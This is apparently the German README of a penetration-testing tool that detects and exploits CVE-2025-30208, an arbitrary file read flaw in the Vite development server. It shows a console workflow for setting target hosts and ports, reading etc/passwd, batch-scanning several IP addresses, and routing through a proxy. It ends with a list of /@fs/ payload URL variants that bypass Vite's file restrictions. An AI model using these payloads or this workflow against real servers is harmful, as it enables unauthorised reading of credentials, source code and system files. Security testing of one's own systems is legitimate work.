
CVE‑2025‑30208 ist eine mittelschwere Schwachstelle zum beliebigen Auslesen von Dateien im Vite-Entwicklungsserver (einem beliebten Frontend-Build-Tool)
Erweiterter Schwachstellenscanner für CVE-2025-30208 mit Unternehmensfunktionen
Professionelles Penetrationstest-Tool zur Erkennung der Vite-Schwachstelle für beliebiges Dateilesen
🚀 Schnellstart • 📋 Funktionen • 🔧 Nutzung • 📊 Beispiele • 🛡️ Sicherheit
Dies ist ein umfassender Schwachstellenscanner, der entwickelt wurde, um die CVE-2025-30208-Schwachstelle in Vite-Entwicklungsservern zu erkennen und auszunutzen. Die Schwachstelle ermöglicht beliebiges Dateilesen über die Dateisystem-Endpunkte von Vite und kann sensible Konfigurationsdateien, Quellcode und Systeminformationen preisgeben.
Das Tool verfügt jetzt über eine modulare Architektur für bessere Wartbarkeit und Erweiterbarkeit:
CVE-2025-30208.py - Hauptscanner-Anwendungpayloads.py - Erweiterte Exploitation-Payloads (60+ Variationen)sensitive_files.py - Umfassende Datenbank sensibler Dateien (200+)html_template.py - Verbesserte Hacker-ähnliche HTML-Berichtsvorlagepip3 install -r requirements.txt
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
CVE-2025-30208 > run
# Ausführlichen Modus für detaillierte Ausgabe aktivieren
CVE-2025-30208 > verbose
CVE-2025-30208 > run
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Drücken Sie zweimal die Eingabetaste zum Beenden]
CVE-2025-30208 > scan
# Proxy konfigurieren
CVE-2025-30208 > proxy
Geben Sie Proxy ein: http://127.0.0.1:8080
# Benutzerdefinierte Header setzen
CVE-2025-30208 > headers
Geben Sie Header ein: {"User-Agent": "Custom Scanner"}
# Ratenbegrenzung konfigurieren
CVE-2025-30208 > rate
Geben Sie Ratenlimit ein: 1.0
# Schönen HTML-Bericht generieren
CVE-2025-30208 > pull
# Webserver zum Anzeigen des Berichts starten
CVE-2025-30208 > web
# Webserver auf bestimmtem Port starten
CVE-2025-30208 > web 8081
# Webserver stoppen
CVE-2025-30208 > web off
| Befehl | Beschreibung | Beispiel |
|---|---|---|
set <option> <value> | Konfigurationsoptionen setzen | set RHOST 192.168.1.100 |
show options | Aktuelle Einstellungen anzeigen | show options |
edit | Interaktiver Optionseditor | edit |
run / exploit | Schwachstellentest ausführen | run |
batch | Mehrere Ziele im Batch scannen | batch |
scan | Sensible Dateien erkennen | scan |
pull | Ergebnisse nach HTML/JSON exportieren | pull |
web [on|off|port] | Webserver für HTML-Berichte | web 8080 |
save | Sitzungskonfiguration speichern | save |
load | Sitzungskonfiguration laden | load |
test | Verbindung zum Ziel testen | test |
validate | Aktuelle Konfiguration validieren | validate |
verbose | Ausführlichen Modus umschalten | verbose |
proxy | Proxy-Einstellungen konfigurieren | proxy |
headers | Benutzerdefinierte HTTP-Header setzen | headers |
rate | Ratenbegrenzung konfigurieren | rate |
log | Protokollinformationen anzeigen | log |
help / ? | Hilfe anzeigen | help |
exit / quit | Tool beenden | exit |
| Option | Beschreibung | Standard | Validierung |
|---|---|---|---|
RHOST | Ziel-Host/IP-Adresse | - | Hostname/IP-Validierung |
RPORT | Ziel-Portnummer | - | Portbereich (1-65535) |
FILEPATH | Zu testender Dateipfad | etc/passwd | Pfadvalidierung |
PROXY | HTTP/HTTPS-Proxy-URL | - | URL-Format-Validierung |
VERBOSE | Ausführliche Ausgabe aktivieren | false | Boolesche Validierung |
RATE_LIMIT | Verzögerung zwischen Anfragen (Sekunden) | 0.3 | Numerische Validierung |
THREADS | Anzahl der Threads für Batch-Scans | 5 | Ganzzahl-Validierung |
TIMEOUT | Anfrage-Timeout (Sekunden) | 5 | Ganzzahl-Validierung |
CUSTOM_HEADERS | Benutzerdefinierte HTTP-Header (JSON) | {} | JSON-Format-Validierung |
Der Scanner verwendet jetzt 60+ verschiedene Payload-Variationen, organisiert in payloads.py:
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug